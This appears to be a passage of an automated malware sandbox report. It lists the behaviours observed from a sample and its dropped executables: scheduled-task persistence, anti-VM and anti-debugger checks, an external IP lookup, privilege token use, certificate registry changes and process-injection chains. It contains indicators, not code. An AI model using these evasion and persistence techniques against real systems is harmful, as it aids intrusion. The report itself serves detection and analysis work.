Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\mi.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\62BD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mi.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\9349.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\69E4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\69E4.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\69E4.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SYSTEM32\schtasks.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2942 = "Sao Tome Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SYSTEM32\schtasks.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SYSTEM32\schtasks.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SYSTEM32\schtasks.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SYSTEM32\schtasks.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" C:\Users\Admin\AppData\Local\Temp\9349.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.NEASNEAS779a53aa3f90186b419cce157caefc492dd5c07072bbc9560992845fbeb34c64exeexeexe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\69E4.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\62BD.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\9349.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\schtasks.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3148 wrote to memory of 1392 N/A N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 3148 wrote to memory of 1392 N/A N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 3148 wrote to memory of 1392 N/A N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 3148 wrote to memory of 4508 N/A N/A C:\Users\Admin\AppData\Local\Temp\62BD.exe
PID 3148 wrote to memory of 4508 N/A N/A C:\Users\Admin\AppData\Local\Temp\62BD.exe
PID 3148 wrote to memory of 4508 N/A N/A C:\Users\Admin\AppData\Local\Temp\62BD.exe
PID 3148 wrote to memory of 3260 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3148 wrote to memory of 3260 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3148 wrote to memory of 2136 N/A N/A C:\Users\Admin\AppData\Local\Temp\67FF.exe
PID 3148 wrote to memory of 2136 N/A N/A C:\Users\Admin\AppData\Local\Temp\67FF.exe
PID 3148 wrote to memory of 2136 N/A N/A C:\Users\Admin\AppData\Local\Temp\67FF.exe
PID 3260 wrote to memory of 4528 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3260 wrote to memory of 4528 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3260 wrote to memory of 4528 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3148 wrote to memory of 3168 N/A N/A C:\Users\Admin\AppData\Local\Temp\69E4.exe
PID 3148 wrote to memory of 3168 N/A N/A C:\Users\Admin\AppData\Local\Temp\69E4.exe
PID 3148 wrote to memory of 3168 N/A N/A C:\Users\Admin\AppData\Local\Temp\69E4.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 1392 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Users\Admin\AppData\Local\Temp\5F80.exe
PID 3148 wrote to memory of 4804 N/A N/A C:\Users\Admin\AppData\Local\Temp\759D.exe
PID 3148 wrote to memory of 4804 N/A N/A C:\Users\Admin\AppData\Local\Temp\759D.exe
PID 3148 wrote to memory of 4804 N/A N/A C:\Users\Admin\AppData\Local\Temp\759D.exe
PID 3148 wrote to memory of 408 N/A N/A C:\Users\Admin\AppData\Local\Temp\7C46.exe
PID 3148 wrote to memory of 408 N/A N/A C:\Users\Admin\AppData\Local\Temp\7C46.exe
PID 3148 wrote to memory of 408 N/A N/A C:\Users\Admin\AppData\Local\Temp\7C46.exe
PID 4804 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\759D.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 4804 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\759D.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 4804 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\759D.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 5040 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5040 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5040 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5040 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\cmd.exe
PID 5040 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\cmd.exe
PID 5040 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\cmd.exe
PID 4764 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Windows\SysWOW64\icacls.exe
PID 4764 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Windows\SysWOW64\icacls.exe
PID 4764 wrote to memory of 2260 N/A C:\Users\Admin\AppData\Local\Temp\5F80.exe C:\Windows\SysWOW64\icacls.exe
PID 4124 wrote to memory of 928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4124 wrote to memory of 928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4124 wrote to memory of 928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4124 wrote to memory of 260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4124 wrote to memory of 260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 4124 wrote to memory of 260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3148 wrote to memory of 3956 N/A N/A C:\Users\Admin\AppData\Local\Temp\9349.exe
PID 3148 wrote to memory of 3956 N/A N/A C:\Users\Admin\AppData\Local\Temp\9349.exe
PID 3148 wrote to memory of 3956 N/A N/A C:\Users\Admin\AppData\Local\Temp\9349.exe
PID 3148 wrote to memory of 4344 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3148 wrote to memory of 4344 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3148 wrote to memory of 4344 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3148 wrote to memory of 4344 N/A N/A C:\Windows\SysWOW64\explorer.exe
